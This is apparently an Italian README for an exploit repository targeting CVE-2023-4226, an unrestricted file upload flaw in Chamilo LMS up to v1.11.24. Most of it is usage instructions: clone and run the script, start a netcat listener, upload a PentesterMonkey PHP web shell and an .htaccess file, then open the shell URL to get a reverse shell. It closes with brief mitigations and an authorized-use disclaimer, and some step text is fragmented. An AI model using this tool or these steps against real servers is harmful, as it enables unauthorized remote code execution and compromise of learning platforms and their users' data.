
Vulnerabilità di caricamento di file senza restrizioni in **Chamilo LMS** (<= v1.11.24).
Script in Python che automatizza lo sfruttamento di CVE-2023-4226, una vulnerabilità di caricamento di file senza restrizioni in Chamilo LMS (<= v1.11.24). Carica una web shell PHP basata su PentesterMonkey e configura .htaccess per ottenere una reverse shell. Ulteriori dettagli: Advisory di STAR Labs.
/main/inc/ajax/work.ajax.php, ottenendo RCE.ch_sid).rce.php con IP e porta./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php per caricare rce.php e .htaccess./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
File: rce.php (PentesterMonkey, incluso nel repository), .htaccess (generato dallo script).
Rete: IP e porta per il listener (es. nc -lvnp 4444).
Clona il repository:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Assegna i permessi di esecuzione allo script:
chmod +x CVE-2023-4226.py
Installa le dipendenze:
pip install requests colorama
Avvia il listener in un terminale:
nc -lvnp 4444
Esegui lo script:
./CVE-2023-4226.py
Inserisci:
ch_sid.Accedi alla web shell per avviare la reverse shell:
http://<chamilo>/app/cache/rce.php
Esempio: http://chamilo.local/app/cache/rce.php
Aggiorna a Chamilo >= v1.11.26.
Sanifica i nomi dei file.
Blocca l'HTML in disable_dangerous_file().
Aggiungi a .htaccess:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Uso esclusivo per test autorizzati. L'uso non autorizzato è illegale.